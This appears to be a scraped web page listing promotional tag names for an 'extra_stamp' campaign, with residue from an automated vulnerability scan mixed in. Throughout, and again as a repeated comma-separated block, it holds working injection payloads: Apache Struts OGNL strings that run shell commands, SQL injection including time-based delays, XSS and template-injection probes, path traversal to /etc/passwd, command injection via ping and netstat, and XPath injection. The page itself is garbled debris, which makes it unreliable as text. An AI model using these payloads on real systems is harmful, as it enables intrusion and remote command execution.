Ads express_campaign express_estamp Express_E-stamp keymessage onlinevdo45sec howtogetestamp SXGP_E-stamp extrastamp_r8 E-Stamp_Promotion extra_stamp extra_stamp_launch extra_stamp_launch_tvc15s extra_stamp_salehere extra_stamp_vdo_bowl extra_stamp_eventpass extra_stamp_vdo_umbrella extra_stamp_vdo_box " class="scroll-links">"> " class="scroll-links">extra_stamp"'> z--> " class="scroll-links">"'> [removed]_q=random(X150750924Y4Z)[removed] extra_stamp [removed]_q_q=random()[removed] [removed] " class="scroll-links">[removed]" SRC=//localhost/j> <[removed]qss=7;//<[removed]" class="scroll-links">"'><[removed]qss=7;//<[removed] <META HTTP-EQUIV="refresh" C>
" class="scroll-links">extra_stamp">
<STYLE type="text/css" a=3>BODY{background:url("[removed]qss=7")}</STYLE> <EMBED SRC=//localhost/q.swf AllowScriptAccess=always></EMBED> " class="scroll-links">"'> ' onEvent=X150750924Y4Z " onEvent=X150750924Y4Z < script a=4>qss=7< /script> [removed]_q(y)[removed] <script src=http://localhost/j qss{{q=(2*2.0)}}qss q Content-Type:text/html Content-Length: 190 HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: a=q Content-Length: 2 AA q Qualys_resp_hdr_injection: Vulnerable q Qualys_resp_hdr_injection: Vulnerable extra_stamp' ;-- # /* `` , ( 1e309 /../../../../../../../etc/passwd ../../../../../../../etc/passwd //..//..//..//..//..//..//..//etc/passwd //....//....//....//....//....//....//....//etc/passwd ../../../../../../../Windows/System32/drivers/etc/hosts %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q2d1hi3j').(#str3='B4D7e6').(#str=#str2+':QQ:'+#str1+':PP:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))} a(){}phpinfo(); function a |netstat -an http://rfitest/ [removed]qxss(X150750924Y4Z); ";(function(){qxss});// ");(function(){qxss});// ';(function(){qxss});// 9;(function(){qxss});// 9 ;(function(){qxss});// '-qxss()-' */;(function(){qxss});/* "-qxss()-" |aaaa =(23.0231*213.759) |${23.0231*213.759}{23.0231*213.759}{{23.0231*213.759}}(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}<%= 23.0231*213.759 %> {23.0231*213.759}${23.0231*213.759}{{=23.0231*213.759}} ;echo 23.0231*213.759;//{@math key=4335.158242899999 method="add" operand=586.23659/} /* #set($value=23.0231*213.759) $value */ (23.0231*213.759) extra_stamp') or 2634=2634 -- extra_stamp') and 2634=1123 -- extra_stamp') /* or klpry */oR 2634=1511 + 1123 -- aND 1124 extra_stamp' or 3789=3789 -- extra_stamp' and 3789=1391 -- extra_stamp' /* or klpry */oR 3789=2398 + 1391 -- aND 1390 extra_stamp or 4325=4325 -- extra_stamp and 4325=2728 -- extra_stamp /* or klpry */oR 4325=1597 + 2728 -- aND 2729 extra_stamp or NULL IS NULL extra_stamp and NULL IS NULL extra_stamp and 7248 IS NULL extra_stamp aND 7248=2491 + 4757 extra_stamp or 6248 IS NULL extra_stamp') or 'swqtp'='swqtp extra_stamp') and 'swqtp'='ptqws extra_stamp') /* or klpry */oR ' aND ptqws'=' aND ptqws extra_stamp oR 6248=2491 + 3757 extra_stamp' or 'tpklq'='tpklq extra_stamp' and 'tpklq'='xqlkp extra_stamp' /* or klpry */oR ' aND xqlkp'=' aND xqlkp extra_stamp1 or 11=11 extra_stamp1 or 11=12 extra_stamp5 oR 9=8 + 1 aaaa&ping; -n 92 localhost& ping -c2 -i91 localhost |ping -c2 -i91 localhost |ping -c2 -i91 localhost| extra_stampWAITFOR DELAY '00:00:29' extra_stamp;WAITFOR DELAY '00:00:29'; extra_stamp);WAITFOR DELAY '00:00:29'-- extra_stamp';WAITFOR DELAY '00:00:29'-- extra_stamp');WAITFOR DELAY '00:00:29'-- extra_stamp',0,0);WAITFOR DELAY'00:00:29'-- extra_stamp + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_1111) extra_stamp' + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_2222) + ' extra_stamp;SELECT sleep(29); -- extra_stamp(SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333) /*'XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR'|"XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR"*/ extra_stamp(#context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false), #_memberAccess["allowStaticMethodAccess"]= new java.lang.Boolean(true), @java.lang.Thread@sleep(28*1000)) [removed]_q=random(X159895492Y4Z)[removed] " class="scroll-links">"'> ' onEvent=X159895492Y4Z " onEvent=X159895492Y4Z [removed]qxss(X159895492Y4Z); extra_stamp oR 6248=2491 + 3756 extra_stamp_vdo_wafflemaker extra_stamp_punpromotion [removed]_q=random(X152955000Y4Z)[removed] " class="scroll-links">"'> ' onEvent=X152955000Y4Z " onEvent=X152955000Y4Z [removed]qxss(X152955000Y4Z); extra_stamัp_launch_tvc15s {{constructor.constructor('alert(1)')()}} {{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}} " class="scroll-links">"> " class="scroll-links">'"--!> " class="scroll-links">'"> round2 round1 extra_stamps_kuteclub [removed]_q=random(X172006160Y4Z)[removed] " class="scroll-links">"'> ' onEvent=X172006160Y4Z " onEvent=X172006160Y4Z was<!--esx-->esi" class="scroll-links">qualyswas<!--esx-->esi [removed]qxss(X172006160Y4Z); extra_stamp' or true() or 'and' = 'and extra_stamp' and false() and 'or' = 'and extra_stamp' or not(false()) or 'true' = 'true extra_stamp or true() or 'and' = 'and' extra_stamp and false() and 'or' = 'and' extra_stamp or not(false()) or 'true' = 'true' extra_stamp" or true() or "and" = "and extra_stamp" and false() and "or" = "and extra_stamp" or not(false()) or "true" = "true extra_stamps_mayrireview
,extra_stamp"'>,z-->,"'>,[removed]_q=random(X150750924Y4Z)[removed],extra_stamp [removed]_q_q=random()[removed],[removed],[removed]" SRC=//localhost/j>,"'><[removed]qss=7;//<[removed],,<META HTTP-EQUIV="refresh" C>,extra_stamp">
,<STYLE type="text/css" a=3>BODY{background:url("[removed]qss=7")}</STYLE>,<EMBED SRC=//localhost/q.swf AllowScriptAccess=always></EMBED>,"'>,' onEvent=X150750924Y4Z ," onEvent=X150750924Y4Z ,< script a=4>qss=7< /script>,[removed]_q(y)[removed],<script src=http://localhost/j ,qss{{q=(2*2.0)}}qss,q Content-Type:text/html Content-Length: 190 HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: a=q Content-Length: 2 AA,q Qualys_resp_hdr_injection: Vulnerable,q Qualys_resp_hdr_injection: Vulnerable ,extra_stamp',;-- ,#,/*,``,,,(,1e309,/../../../../../../../etc/passwd,../../../../../../../etc/passwd,//..//..//..//..//..//..//..//etc/passwd,//....//....//....//....//....//....//....//etc/passwd,../../../../../../../Windows/System32/drivers/etc/hosts,%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())},%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q2d1hi3j').(#str3='B4D7e6').(#str=#str2+':QQ:'+#str1+':PP:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))},a(){}phpinfo(); function a,|netstat -an ,http://rfitest/,[removed]qxss(X150750924Y4Z);,";(function(){qxss});//,");(function(){qxss});//,';(function(){qxss});//,9;(function(){qxss});//,9 ;(function(){qxss});//,'-qxss()-',*/;(function(){qxss});/*,"-qxss()-", |aaaa =(23.0231*213.759) |${23.0231*213.759}{23.0231*213.759}{{23.0231*213.759}}(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}<%= 23.0231*213.759 %>,{23.0231*213.759}${23.0231*213.759}{{=23.0231*213.759}},;echo 23.0231*213.759;//{@math key=4335.158242899999 method="add" operand=586.23659/} /* #set($value=23.0231*213.759) $value */,(23.0231*213.759),extra_stamp') or 2634=2634 -- ,extra_stamp') and 2634=1123 -- ,extra_stamp') /* or klpry */oR 2634=1511 + 1123 -- aND 1124,extra_stamp' or 3789=3789 -- ,extra_stamp' and 3789=1391 -- ,extra_stamp' /* or klpry */oR 3789=2398 + 1391 -- aND 1390,extra_stamp or 4325=4325 -- ,extra_stamp and 4325=2728 -- ,extra_stamp /* or klpry */oR 4325=1597 + 2728 -- aND 2729,extra_stamp or NULL IS NULL ,extra_stamp and NULL IS NULL ,extra_stamp and 7248 IS NULL ,extra_stamp aND 7248=2491 + 4757 ,extra_stamp or 6248 IS NULL ,extra_stamp') or 'swqtp'='swqtp,extra_stamp') and 'swqtp'='ptqws,extra_stamp') /* or klpry */oR ' aND ptqws'=' aND ptqws,extra_stamp oR 6248=2491 + 3757 ,extra_stamp' or 'tpklq'='tpklq,extra_stamp' and 'tpklq'='xqlkp,extra_stamp' /* or klpry */oR ' aND xqlkp'=' aND xqlkp,extra_stamp1 or 11=11,extra_stamp1 or 11=12,extra_stamp5 oR 9=8 + 1,aaaa&ping; -n 92 localhost&,ping -c2 -i91 localhost,|ping -c2 -i91 localhost,|ping -c2 -i91 localhost|,extra_stampWAITFOR DELAY '00:00:29',extra_stamp;WAITFOR DELAY '00:00:29';,extra_stamp);WAITFOR DELAY '00:00:29'-- ,extra_stamp';WAITFOR DELAY '00:00:29'-- ,extra_stamp');WAITFOR DELAY '00:00:29'-- ,extra_stamp',0,0);WAITFOR DELAY'00:00:29'-- ,extra_stamp + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_1111) ,extra_stamp' + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_2222) + ',extra_stamp;SELECT sleep(29); --,extra_stamp(SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333) /*'XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR'|"XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR"*/,extra_stamp(#context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false), #_memberAccess["allowStaticMethodAccess"]= new java.lang.Boolean(true), @java.lang.Thread@sleep(28*1000)),[removed]_q=random(X159895492Y4Z)[removed],"'>,' onEvent=X159895492Y4Z ," onEvent=X159895492Y4Z ,[removed]qxss(X159895492Y4Z);,extra_stamp oR 6248=2491 + 3756 ,extra_stamp_vdo_wafflemaker,extra_stamp_punpromotion,[removed]_q=random(X152955000Y4Z)[removed],"'>,' onEvent=X152955000Y4Z ," onEvent=X152955000Y4Z ,[removed]qxss(X152955000Y4Z);,extra_stamัp_launch_tvc15s,{{constructor.constructor('alert(1)')()}},{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}},">,'"--!>,'">,round2,round1,extra_stamps_kuteclub,[removed]_q=random(X172006160Y4Z)[removed],"'>,' onEvent=X172006160Y4Z ," onEvent=X172006160Y4Z ,qualyswas<!--esx-->esi,[removed]qxss(X172006160Y4Z);,extra_stamp' or true() or 'and' = 'and,extra_stamp' and false() and 'or' = 'and,extra_stamp' or not(false()) or 'true' = 'true,extra_stamp or true() or 'and' = 'and' ,extra_stamp and false() and 'or' = 'and' ,extra_stamp or not(false()) or 'true' = 'true' ,extra_stamp" or true() or "and" = "and,extra_stamp" and false() and "or" = "and,extra_stamp" or not(false()) or "true" = "true,extra_stamps_mayrireview">

Copied